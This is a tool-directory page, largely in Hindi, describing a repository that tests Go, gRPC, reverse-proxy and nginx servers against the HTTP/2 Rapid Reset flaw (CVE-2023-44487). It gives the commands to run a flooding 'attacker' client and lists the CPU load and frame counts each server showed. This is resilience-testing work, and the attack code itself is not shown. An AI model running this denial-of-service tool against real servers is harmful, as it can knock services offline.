Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
golang-CVE-2023-44487 — Go, gRPC, रिवर्स प्रॉक्सी और nginx कॉन्फ़िगरेशन में सर्वर लचीलापन का मूल्यांकन करने के लिए CVE-2023-44487 (HTTP/2 Rapid Reset) के लिए परीक्षण संसाधन और हमलावर उपकरण। | Kitploit
उपकरण/GitHubGitHub/retocode/golang-cve-2023-44487
भेद्यता विश्लेषणशोषणवेब सुरक्षाफज़िंगपेनिट्रेशन टेस्टिंग
GitHubretocode/golang-cve-2023-44487

golang-CVE-2023-44487

Go, gRPC, रिवर्स प्रॉक्सी और nginx कॉन्फ़िगरेशन में सर्वर लचीलापन का मूल्यांकन करने के लिए CVE-2023-44487 (HTTP/2 Rapid Reset) के लिए परीक्षण संसाधन और हमलावर उपकरण।

रिपॉजिटरी देखें
282 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

गोलांग CVE-2023-44487 परीक्षण

इस रिपॉजिटरी में CVE-2023-44487 के लिए परीक्षण संसाधन और परिणाम शामिल हैं। यह विभिन्न गोलांग सर्वर कॉन्फ़िगरेशन के विरुद्ध परीक्षण के लिए https://github.com/secengjeff/rapidresetclient के एक संशोधित संस्करण का उपयोग करता है।

एक सामान्य सर्वर के विरुद्ध परीक्षण

go run server.go
go run attacker.go -requests 500000

परिणाम

go 1.21.0

350% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Total time: 7.99 seconds (62562 rps)

go 1.21.3

75% CPU load (just for a short time at the begin of the attack)

--- Summary ---
Frames sent: HEADERS = 74767, RST_STREAM = 74767
Total time: 3.57 seconds (20921 rps)

starts to fail pretty fast with
62->[::1]:8443: write: connection reset by peer[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer

एक GRPC सर्वर के विरुद्ध परीक्षण

go run grpcserver.go
go run attacker.go -requests 500000

परिणाम

go 1.21.0, golang.org/x/net v0.16.0, google.golang.org/grpc v1.58.0

150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499998
Total time: 10.23 seconds (48898 rps)

go 1.21.3, golang.org/x/net v0.17.0, google.golang.org/grpc v1.59.0

150-200% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 499993
Total time: 8.25 seconds (60639 rps)

हमलावर वास्तव में GRPC एंडपॉइंट को कॉल नहीं करता है, इसलिए 'सामान्य' http2 कॉल के साथ व्यवहार में कोई अंतर नहीं दिखता है। यह अच्छा है या बुरा, इस बारे में बहुत निश्चित नहीं हूँ, लेकिन सर्वर ट्रैफ़िक के साथ बने रहने में सफल होता है।

एक httputil.ReverseProxy सर्वर के विरुद्ध परीक्षण

# use nginx as target
sudo nginx -c $PWD/nginx/vulnerable_8444.conf -g daemon\ off\;
go run revproxyserver.go
go run attacker.go -requests 500000

परिणाम

go 1.21.0

200% CPU load during the full attack

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 25
Total time: 9.43 seconds (53014 rps)

go 1.21.3

150% CPU load (just for a short time at the begin of the attack)

--- Summary ---
Frames sent: HEADERS = 100194, RST_STREAM = 100193
Total time: 4.36 seconds (22955 rps)

starts to fail pretty fast with
62->[::1]:8443: write: connection reset by peer[999995] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999997] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[999999] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send HEADERS: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer[1000001] Failed to send RST_STREAM: write tcp [::1]:60762->[::1]:8443: write: connection reset by peer

सर्वर लॉग में अब 😎 शामिल है
2023/10/25 14:45:54 http2: server connection error from [::1]:60762: connection error: ENHANCE_YOUR_CALM

nginx के विरुद्ध परीक्षण

sudo nginx -c $PWD/nginx/vulnerable.conf -g daemon\ off\;
go run attacker.go -requests 500000

परिणाम

असुरक्षित कॉन्फ़िगरेशन के साथ

100% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 478609
Total time: 8.13 seconds (61484 rps)

डिफ़ॉल्ट कॉन्फ़िगरेशन के साथ

34% CPU load

--- Summary ---
Frames sent: HEADERS = 500000, RST_STREAM = 500000
Frames received: 1432
Total time: 7.62 seconds (65588 rps)

Nginx बहुत सारे फ्रेमों का जवाब देना बंद कर देता है

टूल डाउनलोड करें